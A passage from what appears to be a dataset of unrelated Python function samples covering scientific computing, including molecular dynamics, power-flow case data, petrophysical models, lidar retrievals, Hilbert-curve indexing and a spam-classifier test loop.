i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = 
tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 
1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, 
[2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if 
trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix 
Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. 
Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. 
T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n 